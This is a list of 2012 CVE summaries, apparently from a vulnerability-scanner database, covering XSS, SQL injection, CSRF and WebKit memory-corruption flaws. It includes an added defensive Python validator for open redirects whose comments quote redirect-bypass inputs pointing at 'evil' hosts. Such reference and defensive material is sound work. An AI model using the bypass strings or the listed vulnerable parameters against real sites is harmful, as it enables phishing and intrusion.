[CVE-2012-4071] Cross-site scripting (XSS) vulnerability in the comments module in the RSGallery2 (com_rsgallery2) component before 2.3.0 for Joomla! 1.5.x, and before 3.2.0 for Joomla! 2.5.x, allows remote attackers to inject arbitrary web script or HTML via crafted BBCode markup in a comment.
[CVE-2012-4070] SQL injection vulnerability in system/src/dispatcher.php in Dir2web 3.0 allows remote attackers to execute arbitrary SQL commands via the oid parameter in a homepage action to index.php.
[CVE-2012-4069] Dir2web 3.0 stores sensitive information under the web root with insufficient access control, which allows remote attackers to download the database via a direct request for system/db/website.db.
[CVE-2012-4065] Eucalyptus before 3.1.1 does not properly restrict the binding of external SOAP web-services messages, which allows remote authenticated users to bypass unspecified authorization checks and obtain direct access to a (1) Cloud Controller or (2) Walrus service via a crafted message, as demonstrated by changes to a volume, snapshot, or cloud configuration setting.
[CVE-2012-4064] Eucalyptus before 3.1.1 does not properly restrict the binding of external SOAP web-services messages, which allows remote authenticated users to gain privileges by sending a message to (1) Cloud Controller or (2) Walrus with the internal message format and a modified user id.
[CVE-2012-4058] Cross-site scripting (XSS) vulnerability in SocketMail Pro 2.2.9 allows remote attackers to inject arbitrary web script or HTML via the subject of an email.
[CVE-2012-4052] Multiple cross-site scripting (XSS) vulnerabilities in Jease before 2.9, when creating a comment, allow remote attackers to inject arbitrary web script or HTML via the (1) author, (2) subject, or (3) comment parameter.
[CVE-2012-4051] Multiple cross-site request forgery (CSRF) vulnerabilities in editAccount.html in the JAMF Software Server (JSS) interface in JAMF Casper Suite before 8.61 allow remote attackers to hijack the authentication of administrators for requests that (1) create user accounts or (2) change passwords via a Save action.
[CVE-2012-4043] Cross-site scripting (XSS) vulnerability in global-protect/login.esp in Palo Alto Networks Global Protect Portal, Global Protect Gateway, and SSL VPN portals 3.1.x through 3.1.11 and 4.0.x through 4.0.5 allows remote attackers to inject arbitrary web script or HTML via the inputStr parameter in a Login action.
[CVE-2012-4037] Multiple cross-site scripting (XSS) vulnerabilities in the web client in Transmission before 2.61 allow remote attackers to inject arbitrary web script or HTML via the (1) comment, (2) created by, or (3) name field in a torrent file.
[CVE-2012-4033] Multiple unspecified vulnerabilities in the Zingiri Web Shop plugin before 2.4.0 for WordPress have unknown impact and attack vectors.
[CVE-2012-4032] Open redirect vulnerability in the login page in WebsitePanel before 1.2.2.1 allows remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via a URL in ReturnUrl to Default.aspx.
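The WebsitePanel ReturnUrl entry and the Drupal Secure Login q-parameter entry (CVE-2012-4489) are both open redirects: a post-login destination taken from the request and followed without checking that it stays on the site. The Python below is an added example, not WebsitePanel or Drupal code and not part of the database; the allowed host name is constructed. It is the validator a practitioner would put in front of the redirect, and it covers the bypasses that defeat a naive "starts with /" check.

```python
# Added example (not from the vulscan database or from any vendor):
# validate a post-login redirect target before issuing a 302.
from urllib.parse import urlsplit, unquote

# Constructed: the host(s) this site is served from.
ALLOWED_HOSTS = {"panel.example.test"}


def is_safe_redirect(target: str, allowed_hosts=ALLOWED_HOSTS) -> bool:
    """True only for a site-relative path or an absolute URL on our own host."""
    if not target:
        return False
    t = unquote(target).strip()           # "%2F%2Fevil" is "//evil" to a browser
    t = t.replace("\\", "/")              # browsers read "/\evil" as "//evil"
    if any(ord(ch) < 0x20 for ch in t):   # tab/newline tricks such as "java\tscript:"
        return False
    parts = urlsplit(t)
    if parts.scheme and parts.scheme.lower() not in ("http", "https"):
        return False                      # javascript:, data:, vbscript:, ...
    if parts.netloc:
        # Absolute or protocol-relative URL: hostname (not netloc) so that
        # "https://panel.example.test@evil.test/" resolves to evil.test.
        return parts.hostname in allowed_hosts
    # No authority: accept a plain site-relative path, but not "//..." or
    # "///...", which browsers resolve to an external host.
    return t.startswith("/") and not t.startswith("//")


def safe_redirect_target(target: str, default: str = "/") -> str:
    """Destination to put in the Location header."""
    return target if is_safe_redirect(target) else default
```

Bare relative paths such as "dashboard" are rejected on purpose; if the application needs them, resolve them against a fixed base path server-side rather than loosening the check.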
[CVE-2012-4018] Cross-site scripting (XSS) vulnerability in Final Beta Laboratory MyWebSearch before 1.23 allows remote attackers to inject arbitrary web script or HTML via the keywords parameter.
[CVE-2012-4017] The jigbrowser+ application before 1.5.0 for Android does not properly implement the WebView class, which allows remote attackers to obtain sensitive information via a crafted application.
[CVE-2012-4015] Cross-site scripting (XSS) vulnerability in the management screen in myLittleTools myLittleAdmin for SQL Server 2000 allows remote attackers to inject arbitrary web script or HTML via vectors that trigger a crafted database entry.
[CVE-2012-4014] Unspecified vulnerability in McAfee Email Anti-virus (formerly WebShield SMTP) allows remote attackers to cause a denial of service via unknown vectors.
[CVE-2012-4013] The WebView class in the Cybozu KUNAI Browser for Remote Service application beta for Android allows remote attackers to execute arbitrary JavaScript code, and obtain sensitive information, via a crafted application that places this code into a local file associated with a file: URL.
[CVE-2012-4012] The WebView class in the Cybozu KUNAI application before 2.0.6 for Android allows remote attackers to execute arbitrary JavaScript code, and obtain sensitive information, via a crafted application that places this code into a local file associated with a file: URL.
[CVE-2012-4011] The Cybozu KUNAI application before 2.0.6 for Android allows remote attackers to execute arbitrary Java methods, and obtain sensitive information or execute arbitrary commands, via a crafted web site.
[CVE-2012-4009] The WebView class in the Cybozu Live application 1.0.4 and earlier for Android allows remote attackers to execute arbitrary JavaScript code, and obtain sensitive information, via a crafted application that places this code into a local file associated with a file: URL.
[CVE-2012-4008] The Cybozu Live application 1.0.4 and earlier for Android allows remote attackers to execute arbitrary Java methods, and obtain sensitive information or execute arbitrary commands, via a crafted web site.
[CVE-2012-4006] The GREE application before 1.4.0, GREE Tanken Dorirando application before 1.0.7, GREE Tsurisuta application before 1.5.0, GREE Monpura application before 1.1.1, GREE Kaizokuoukoku Columbus application before 1.3.5, GREE haconiwa application before 1.1.0, GREE Seisen Cerberus application before 1.1.0, and KDDI&GREE GREE Market application before 2.1.2 for Android do not properly implement the WebView class, which allows remote attackers to obtain sensitive information via a crafted application.
[CVE-2012-4004] Cross-site scripting (XSS) vulnerability in the Sleipnir Mobile application 2.2.0 and earlier and Sleipnir Mobile Black Edition application 2.2.0 and earlier for Android allows remote attackers to inject arbitrary web script or HTML via a crafted application that interacts with an unspecified Sleipnir Mobile function.
[CVE-2012-4003] Multiple cross-site scripting (XSS) vulnerabilities in GLPI-PROJECT GLPI before 0.83.3 allow remote attackers to inject arbitrary web script or HTML via unknown vectors.
[CVE-2012-4000] Cross-site scripting (XSS) vulnerability in the print_textinputs_var function in editor/dialog/fck_spellerpages/spellerpages/server-scripts/spellchecker.php in FCKeditor 2.6.7 and earlier allows remote attackers to inject arbitrary web script or HTML via textinputs array parameters.
[CVE-2012-3999] Cross-site scripting (XSS) vulnerability in admin/login.php in Sticky Notes 0.3.09062012.4 and earlier allows remote attackers to inject arbitrary web script or HTML via the username parameter.
[CVE-2012-3997] Multiple cross-site scripting (XSS) vulnerabilities in Sticky Notes before 0.2.27052012.5 allow remote attackers to inject arbitrary web script or HTML via the (1) paste_user or (2) paste_lang parameter to (a) list.php or (b) show.php.
[CVE-2012-3993] The Chrome Object Wrapper (COW) implementation in Mozilla Firefox before 16.0, Firefox ESR 10.x before 10.0.8, Thunderbird before 16.0, Thunderbird ESR 10.x before 10.0.8, and SeaMonkey before 2.13 does not properly interact with failures of InstallTrigger methods, which allows remote attackers to execute arbitrary JavaScript code with chrome privileges via a crafted web site, related to an "XrayWrapper pollution" issue.
[CVE-2012-3991] Mozilla Firefox before 16.0, Firefox ESR 10.x before 10.0.8, Thunderbird before 16.0, Thunderbird ESR 10.x before 10.0.8, and SeaMonkey before 2.13 do not properly restrict JSAPI access to the GetProperty function, which allows remote attackers to bypass the Same Origin Policy and possibly have unspecified other impact via a crafted web site.
[CVE-2012-3989] Mozilla Firefox before 16.0, Thunderbird before 16.0, and SeaMonkey before 2.13 do not properly perform a cast of an unspecified variable during use of the instanceof operator on a JavaScript object, which allows remote attackers to execute arbitrary code or cause a denial of service (assertion failure) via a crafted web site.
[CVE-2012-3987] Mozilla Firefox before 16.0 on Android assigns chrome privileges to Reader Mode pages, which allows user-assisted remote attackers to bypass intended access restrictions via a crafted web site.
[CVE-2012-3984] Mozilla Firefox before 16.0, Thunderbird before 16.0, and SeaMonkey before 2.13 do not properly handle navigation away from a web page that has a SELECT element's menu active, which allows remote attackers to spoof page content via vectors involving absolute positioning and scrolling.
[CVE-2012-3980] The web console in Mozilla Firefox before 15.0, Firefox ESR 10.x before 10.0.7, Thunderbird before 15.0, and Thunderbird ESR 10.x before 10.0.7 allows user-assisted remote attackers to execute arbitrary JavaScript code with chrome privileges via a crafted web site that injects this code and triggers an eval operation.
[CVE-2012-3979] Mozilla Firefox before 15.0 on Android does not properly implement unspecified callers of the __android_log_print function, which allows remote attackers to execute arbitrary code via a crafted web page that calls the JavaScript dump function.
[CVE-2012-3976] Mozilla Firefox before 15.0, Firefox ESR 10.x before 10.0.7, and SeaMonkey before 2.12 do not properly handle onLocationChange events during navigation between different https sites, which allows remote attackers to spoof the X.509 certificate information in the address bar via a crafted web page.
[CVE-2012-3968] Use-after-free vulnerability in the WebGL implementation in Mozilla Firefox before 15.0, Firefox ESR 10.x before 10.0.7, Thunderbird before 15.0, Thunderbird ESR 10.x before 10.0.7, and SeaMonkey before 2.12 allows remote attackers to execute arbitrary code via vectors related to deletion of a fragment shader by its accessor.
[CVE-2012-3967] The WebGL implementation in Mozilla Firefox before 15.0, Firefox ESR 10.x before 10.0.7, Thunderbird before 15.0, Thunderbird ESR 10.x before 10.0.7, and SeaMonkey before 2.12 on Linux, when a large number of sampler uniforms are used, does not properly interact with Mesa drivers, which allows remote attackers to execute arbitrary code or cause a denial of service (stack memory corruption) via a crafted web site.
[CVE-2012-3965] Mozilla Firefox before 15.0 does not properly restrict navigation to the about:newtab page, which allows remote attackers to execute arbitrary JavaScript code with chrome privileges via a crafted web site that triggers creation of a new tab and then a new window.
[CVE-2012-3952] Cross-site scripting (XSS) vulnerability in admin/index.php in phpList before 2.10.19 allows remote attackers to inject arbitrary web script or HTML via the unconfirmed parameter to the user page.
[CVE-2012-3941] Heap-based buffer overflow in the Cisco WebEx Recording Format (WRF) player T27 before LD SP32 EP10 and T28 before T28.4 allows remote attackers to execute arbitrary code via a crafted WRF file, aka Bug ID CSCtz72850.
[CVE-2012-3940] Buffer overflow in the Cisco WebEx Recording Format (WRF) player T27 before LD SP32 EP10 and T28 before T28.4 allows remote attackers to execute arbitrary code via a crafted WRF file, aka Bug ID CSCtz72958.
[CVE-2012-3939] Buffer overflow in the Cisco WebEx Recording Format (WRF) player T27 before LD SP32 EP10 and T28 before T28.4 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted WRF file, aka Bug ID CSCua61331.
[CVE-2012-3938] Buffer overflow in the Cisco WebEx Recording Format (WRF) player T27 before LD SP32 EP10 and T28 before T28.4 allows remote attackers to execute arbitrary code via a crafted WRF file, aka Bug ID CSCtz73583.
[CVE-2012-3937] Buffer overflow in the Cisco WebEx Recording Format (WRF) player T27 before LD SP32 EP10 and T28 before T28.4 allows remote attackers to execute arbitrary code via a crafted WRF file, aka Bug ID CSCtz72967.
[CVE-2012-3936] Buffer overflow in the Cisco WebEx Recording Format (WRF) player T27 before LD SP32 EP10 and T28 before T28.4 allows remote attackers to execute arbitrary code via a crafted WRF file, aka Bug ID CSCua40962.
[CVE-2012-3924] The SSLVPN implementation in Cisco IOS 15.1 and 15.2, when DTLS is enabled, does not properly handle certain outbound ACL configurations, which allows remote authenticated users to cause a denial of service (device crash) via a session involving a PPP over ATM (PPPoA) interface, aka Bug ID CSCty97961.
[CVE-2012-3923] The SSLVPN implementation in Cisco IOS 12.4, 15.0, 15.1, and 15.2, when DTLS is not enabled, does not properly handle certain outbound ACL configurations, which allows remote authenticated users to cause a denial of service (device crash) via a session involving a PPP over ATM (PPPoA) interface, aka Bug ID CSCte41827.
[CVE-2012-3913] The Cisco VC220 and VC240 cameras allow remote attackers to cause a denial of service (WebUI outage) via crafted packets, aka Bug IDs CSCtf73188, CSCtf88059, CSCtf87951, CSCtf87908, and CSCtf88019.
[CVE-2012-3908] Multiple cross-site request forgery (CSRF) vulnerabilities in the ISE Administrator user interface (aka the Apache Tomcat interface) on Cisco Identity Services Engine (ISE) 3300 series appliances before 1.1.0.665 Cumulative Patch 1 allow remote attackers to hijack the authentication of administrators, aka Bug ID CSCty46684.
[CVE-2012-3872] Multiple cross-site scripting (XSS) vulnerabilities in Open Constructor 3.12.0 allow remote attackers to inject arbitrary web script or HTML via (1) the result parameter to data/file/edit.php, (2) the q parameter to confirm.php, or (3) the keyword parameter to users/users.php.
[CVE-2012-3871] Cross-site scripting (XSS) vulnerability in data/hybrid/i_hybrid.php in Open Constructor 3.12.0 allows remote authenticated users to inject arbitrary web script or HTML via the header parameter.
[CVE-2012-3870] Multiple cross-site scripting (XSS) vulnerabilities in objects/createobject.php in Open Constructor 3.12.0 allow remote authenticated users to inject arbitrary web script or HTML via the (1) name or (2) description parameter.
[CVE-2012-3869] Cross-site scripting (XSS) vulnerability in include/classes/class.rex_list.inc.php in REDAXO 4.3.x and 4.4 allows remote attackers to inject arbitrary web script or HTML via the subpage parameter to index.php.
[CVE-2012-3859] Unspecified vulnerability in the WebAdmin Portal in Netsweeper has unknown impact and attack vectors, a different vulnerability than CVE-2012-2446 and CVE-2012-2447.
[CVE-2012-3848] Multiple cross-site scripting (XSS) vulnerabilities in the web console in Plixer Scrutinizer (aka Dell SonicWALL Scrutinizer) before 9.5.0 allow remote attackers to inject arbitrary web script or HTML via (1) the query string to d4d/exporters.php, (2) the HTTP Referer header to d4d/exporters.php, or (3) unspecified input to d4d/contextMenu.php.
[CVE-2012-3846] Cross-site scripting (XSS) vulnerability in index.php in PHP-pastebin 2.1 allows remote attackers to inject arbitrary web script or HTML via the title parameter.
[CVE-2012-3844] Cross-site scripting (XSS) vulnerability in vBulletin 4.1.12 allows remote attackers to inject arbitrary web script or HTML via a long string in the subject parameter when creating a post.
[CVE-2012-3843] Cross-site scripting (XSS) vulnerability in the registration page in e107, probably 1.0.1, allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.
[CVE-2012-3842] Multiple cross-site scripting (XSS) vulnerabilities in CMD_DOMAIN in JBMC Software DirectAdmin 1.403 allow remote authenticated users with certain privileges to inject arbitrary web script or HTML via the (1) select0 or (2) select8 parameters.
[CVE-2012-3840] Multiple cross-site scripting (XSS) vulnerabilities in index.php/users/form/user_id in MyClientBase 0.12 allow remote attackers to inject arbitrary web script or HTML via the (1) first_name or (2) last_name parameters.
[CVE-2012-3837] Multiple cross-site scripting (XSS) vulnerabilities in apps/users/registration.template.php in Baby Gekko 1.2.0 and earlier allow remote attackers to inject arbitrary web script or HTML via the (1) username, (2) email_address, (3) password, (4) password_verify, (5) firstname, (6) lastname, or (7) verification_code parameter to users/action/register. NOTE: some of these details are obtained from third party information.
[CVE-2012-3836] Multiple cross-site scripting (XSS) vulnerabilities in Baby Gekko before 1.2.0 allow remote attackers to inject arbitrary web script or HTML via the (1) groupname parameter in a savecategory in the users module
[CVE-2012-3835] Multiple cross-site scripting (XSS) vulnerabilities in AlienVault Open Source Security Information Management (OSSIM) 3.1 allow remote attackers to inject arbitrary web script or HTML via the (1) url parameter to top.php or (2) time[0][0] parameter to forensics/base_qry_main.php, which is not properly handled in an error page.
[CVE-2012-3833] Cross-site scripting (XSS) vulnerability in the default index page in admin/ in Quick.CMS 4.0 allows remote attackers to inject arbitrary web script or HTML via the p parameter.
[CVE-2012-3832] Cross-site scripting (XSS) vulnerability in decoda/Decoda.php in Decoda before 3.2 allows remote attackers to inject arbitrary web script or HTML via vectors related to (1) b or (2) div tags.
[CVE-2012-3831] Cross-site scripting (XSS) vulnerability in decoda/templates/video.php in Decoda before 3.3.1 allows remote attackers to inject arbitrary web script or HTML via multiple URLs in an img tag.
[CVE-2012-3830] Cross-site scripting (XSS) vulnerability in decoda/templates/video.php in Decoda before 3.3.3 allows remote attackers to inject arbitrary web script or HTML via the video directive.
[CVE-2012-3828] Cross-site scripting (XSS) vulnerability in Joomla! 2.5.3 allows remote attackers to inject arbitrary web script or HTML via the Host HTTP Header.
[CVE-2012-3819] Stack consumption vulnerability in dartwebserver.dll 1.9 and earlier, as used in Dart PowerTCP WebServer for ActiveX and other products, allows remote attackers to cause a denial of service (daemon crash) via a long request.
[CVE-2012-3805] Multiple cross-site scripting (XSS) vulnerabilities in the getAllPassedParams function in system/functions.php in Kajona before 3.4.2 allow remote attackers to inject arbitrary web script or HTML via the (1) absender_name, (2) absender_email, or (3) absender_nachricht parameter to the content page
[CVE-2012-3800] Cross-site scripting (XSS) vulnerability in og.js in the Organic Groups (OG) module 6.x-2.x before 6.x-2.4 for Drupal, when used with the Vertical Tabs module, allows remote authenticated users to inject arbitrary web script or HTML via vectors related to the group title.
[CVE-2012-3791] Multiple SQL injection vulnerabilities in Simple Web Content Management System 1.1 allow remote attackers to execute arbitrary SQL commands via the id parameter to (1) item_delete.php, (2) item_status.php, (3) item_detail.php, (4) item_modify.php, or (5) item_position.php in admin/
[CVE-2012-3790] Cross-site scripting (XSS) vulnerability in index.php in Adiscon LogAnalyzer before 3.4.4 and 3.5.x before 3.5.5 allows remote attackers to inject arbitrary web script or HTML via the highlight parameter in a Search action.
[CVE-2012-3748] Race condition in WebKit in Apple iOS before 6.0.1 and Safari before 6.0.2 allows remote attackers to execute arbitrary code or cause a denial of service (application crash) via vectors involving JavaScript arrays.
[CVE-2012-3747] WebKit, as used in Apple iOS before 6, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site.
[CVE-2012-3746] UIWebView in UIKit in Apple iOS before 6 does not properly use the Data Protection feature, which allows context-dependent attackers to obtain cleartext file content by leveraging direct access to a device's filesystem.
[CVE-2012-3742] Safari in Apple iOS before 6 does not properly restrict use of an unspecified Unicode character that looks similar to the https lock indicator, which allows remote attackers to spoof https connections by placing this character in the TITLE element of a web page.
[CVE-2012-3729] The Berkeley Packet Filter (BPF) interpreter implementation in the kernel in Apple iOS before 6 accesses uninitialized memory locations, which allows local users to obtain sensitive information about the layout of kernel memory via a crafted program that uses a BPF interface.
[CVE-2012-3721] Profile Manager in Apple Mac OS X before 10.7.5 does not properly perform authentication for the Device Management private interface, which allows attackers to enumerate managed devices via unspecified vectors.
[CVE-2012-3719] Mail in Apple Mac OS X before 10.7.5 does not properly handle embedded web plugins, which allows remote attackers to execute arbitrary plugin code via an e-mail message that triggers the loading of a third-party plugin.
[CVE-2012-3714] The Form Autofill feature in Apple Safari before 6.0.1 does not restrict the filled fields to the set of fields contained in an Autofill popover, which allows remote attackers to obtain the Me card from an Address Book via a crafted web site.
[CVE-2012-3712] WebKit, as used in Apple iTunes before 10.7, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site, a different vulnerability than other WebKit CVEs listed in APPLE-SA-2012-09-12-1.
[CVE-2012-3711] WebKit, as used in Apple iTunes before 10.7, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site, a different vulnerability than other WebKit CVEs listed in APPLE-SA-2012-09-12-1.
[CVE-2012-3710] WebKit, as used in Apple iTunes before 10.7, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site, a different vulnerability than other WebKit CVEs listed in APPLE-SA-2012-09-12-1.
[CVE-2012-3709] WebKit, as used in Apple iTunes before 10.7, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site, a different vulnerability than other WebKit CVEs listed in APPLE-SA-2012-09-12-1.
[CVE-2012-3708] WebKit, as used in Apple iTunes before 10.7, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site, a different vulnerability than other WebKit CVEs listed in APPLE-SA-2012-09-12-1.
[CVE-2012-3707] WebKit, as used in Apple iTunes before 10.7, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site, a different vulnerability than other WebKit CVEs listed in APPLE-SA-2012-09-12-1.
[CVE-2012-3706] WebKit, as used in Apple iTunes before 10.7, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site, a different vulnerability than other WebKit CVEs listed in APPLE-SA-2012-09-12-1.
[CVE-2012-3705] WebKit, as used in Apple iTunes before 10.7, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site, a different vulnerability than other WebKit CVEs listed in APPLE-SA-2012-09-12-1.
[CVE-2012-3704] WebKit, as used in Apple iTunes before 10.7, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site, a different vulnerability than other WebKit CVEs listed in APPLE-SA-2012-09-12-1.
[CVE-2012-3703] WebKit, as used in Apple iTunes before 10.7, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site, a different vulnerability than other WebKit CVEs listed in APPLE-SA-2012-09-12-1.
[CVE-2012-3702] WebKit, as used in Apple iTunes before 10.7, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site, a different vulnerability than other WebKit CVEs listed in APPLE-SA-2012-09-12-1.
[CVE-2012-3701] WebKit, as used in Apple iTunes before 10.7, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site, a different vulnerability than other WebKit CVEs listed in APPLE-SA-2012-09-12-1.
[CVE-2012-3700] WebKit, as used in Apple iTunes before 10.7, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site, a different vulnerability than other WebKit CVEs listed in APPLE-SA-2012-09-12-1.
[CVE-2012-3699] WebKit, as used in Apple iTunes before 10.7, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site, a different vulnerability than other WebKit CVEs listed in APPLE-SA-2012-09-12-1.
[CVE-2012-3697] WebKit in Apple Safari before 6.0 does not properly handle file: URLs, which allows remote attackers to bypass intended sandbox restrictions and read arbitrary files by leveraging a WebProcess compromise.
[CVE-2012-3696] CRLF injection vulnerability in WebKit in Apple Safari before 6.0 allows remote attackers to inject arbitrary HTTP headers and conduct HTTP request splitting attacks via a crafted web site that leverages improper WebSockets URI handling.
[CVE-2012-3695] Cross-site scripting (XSS) vulnerability in WebKit in Apple Safari before 6.0 allows remote attackers to inject arbitrary web script or HTML by leveraging improper URL canonicalization during the handling of the location.href property.
[CVE-2012-3694] WebKit in Apple Safari before 6.0 does not properly handle drag-and-drop events, which allows user-assisted remote attackers to obtain sensitive information about full pathnames via a crafted web site.
[CVE-2012-3693] Incomplete blacklist vulnerability in WebKit in Apple Safari before 6.0 allows remote attackers to spoof domain names in URLs, and possibly conduct phishing attacks, by leveraging the availability of IDN support and Unicode fonts to construct unspecified homoglyphs.
[CVE-2012-3692] WebKit, as used in Apple iTunes before 10.7, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site, a different vulnerability than other WebKit CVEs listed in APPLE-SA-2012-09-12-1.
[CVE-2012-3691] WebKit in Apple Safari before 6.0 does not properly handle Cascading Style Sheets (CSS) property values, which allows remote attackers to bypass the Same Origin Policy via a crafted web site.
[CVE-2012-3690] WebKit in Apple Safari before 6.0 does not properly handle drag-and-drop events, which allows user-assisted remote attackers to read arbitrary files via a crafted web site.
[CVE-2012-3689] WebKit in Apple Safari before 6.0 does not properly handle drag-and-drop events, which allows user-assisted remote attackers to bypass the Same Origin Policy via a crafted web site.
[CVE-2012-3688] WebKit, as used in Apple iTunes before 10.7, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site, a different vulnerability than other WebKit CVEs listed in APPLE-SA-2012-09-12-1.
[CVE-2012-3687] WebKit, as used in Apple iTunes before 10.7, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site, a different vulnerability than other WebKit CVEs listed in APPLE-SA-2012-09-12-1.
[CVE-2012-3686] WebKit, as used in Apple Safari before 6.0, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site, a different vulnerability than other WebKit CVEs listed in APPLE-SA-2012-07-25-1.
[CVE-2012-3685] WebKit, as used in Apple iTunes before 10.7, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site, a different vulnerability than other WebKit CVEs listed in APPLE-SA-2012-09-12-1.
[CVE-2012-3684] WebKit, as used in Apple iTunes before 10.7, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site, a different vulnerability than other WebKit CVEs listed in APPLE-SA-2012-09-12-1.
[CVE-2012-3683] WebKit, as used in Apple Safari before 6.0, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site, a different vulnerability than other WebKit CVEs listed in APPLE-SA-2012-07-25-1.
[CVE-2012-3682] WebKit, as used in Apple Safari before 6.0, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site, a different vulnerability than other WebKit CVEs listed in APPLE-SA-2012-07-25-1.
[CVE-2012-3681] WebKit, as used in Apple Safari before 6.0, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site, a different vulnerability than other WebKit CVEs listed in APPLE-SA-2012-07-25-1.
[CVE-2012-3680] WebKit, as used in Apple Safari before 6.0, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site, a different vulnerability than other WebKit CVEs listed in APPLE-SA-2012-07-25-1.
[CVE-2012-3679] WebKit, as used in Apple Safari before 6.0, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site, a different vulnerability than other WebKit CVEs listed in APPLE-SA-2012-07-25-1.
[CVE-2012-3678] WebKit, as used in Apple Safari before 6.0, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site, a different vulnerability than other WebKit CVEs listed in APPLE-SA-2012-07-25-1.
[CVE-2012-3677] WebKit, as used in Apple iTunes before 10.7, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site, a different vulnerability than other WebKit CVEs listed in APPLE-SA-2012-09-12-1.
[CVE-2012-3676] WebKit, as used in Apple iTunes before 10.7, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site, a different vulnerability than other WebKit CVEs listed in APPLE-SA-2012-09-12-1.
[CVE-2012-3675] WebKit, as used in Apple iTunes before 10.7, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site, a different vulnerability than other WebKit CVEs listed in APPLE-SA-2012-09-12-1.
[CVE-2012-3674] WebKit, as used in Apple Safari before 6.0, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site, a different vulnerability than other WebKit CVEs listed in APPLE-SA-2012-07-25-1.
[CVE-2012-3673] WebKit, as used in Apple iTunes before 10.7, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site, a different vulnerability than other WebKit CVEs listed in APPLE-SA-2012-09-12-1.
[CVE-2012-3672] WebKit, as used in Apple iTunes before 10.7, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site, a different vulnerability than other WebKit CVEs listed in APPLE-SA-2012-09-12-1.
[CVE-2012-3671] WebKit, as used in Apple iTunes before 10.7, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site, a different vulnerability than other WebKit CVEs listed in APPLE-SA-2012-09-12-1.
[CVE-2012-3670] WebKit, as used in Apple Safari before 6.0, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site, a different vulnerability than other WebKit CVEs listed in APPLE-SA-2012-07-25-1.
[CVE-2012-3669] WebKit, as used in Apple Safari before 6.0, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site, a different vulnerability than other WebKit CVEs listed in APPLE-SA-2012-07-25-1.
[CVE-2012-3668] WebKit, as used in Apple Safari before 6.0, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site, a different vulnerability than other WebKit CVEs listed in APPLE-SA-2012-07-25-1.
[CVE-2012-3667] WebKit, as used in Apple Safari before 6.0, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site, a different vulnerability than other WebKit CVEs listed in APPLE-SA-2012-07-25-1.
[CVE-2012-3666] WebKit, as used in Apple Safari before 6.0, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site, a different vulnerability than other WebKit CVEs listed in APPLE-SA-2012-07-25-1.
[CVE-2012-3665] WebKit, as used in Apple Safari before 6.0, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site, a different vulnerability than other WebKit CVEs listed in APPLE-SA-2012-07-25-1.
[CVE-2012-3664] WebKit, as used in Apple Safari before 6.0, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site, a different vulnerability than other WebKit CVEs listed in APPLE-SA-2012-07-25-1.
[CVE-2012-3663] WebKit, as used in Apple Safari before 6.0, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site, a different vulnerability than other WebKit CVEs listed in APPLE-SA-2012-07-25-1.
[CVE-2012-3661] WebKit, as used in Apple Safari before 6.0, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site, a different vulnerability than other WebKit CVEs listed in APPLE-SA-2012-07-25-1.
[CVE-2012-3660] WebKit, as used in Apple iTunes before 10.7, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site, a different vulnerability than other WebKit CVEs listed in APPLE-SA-2012-09-12-1.
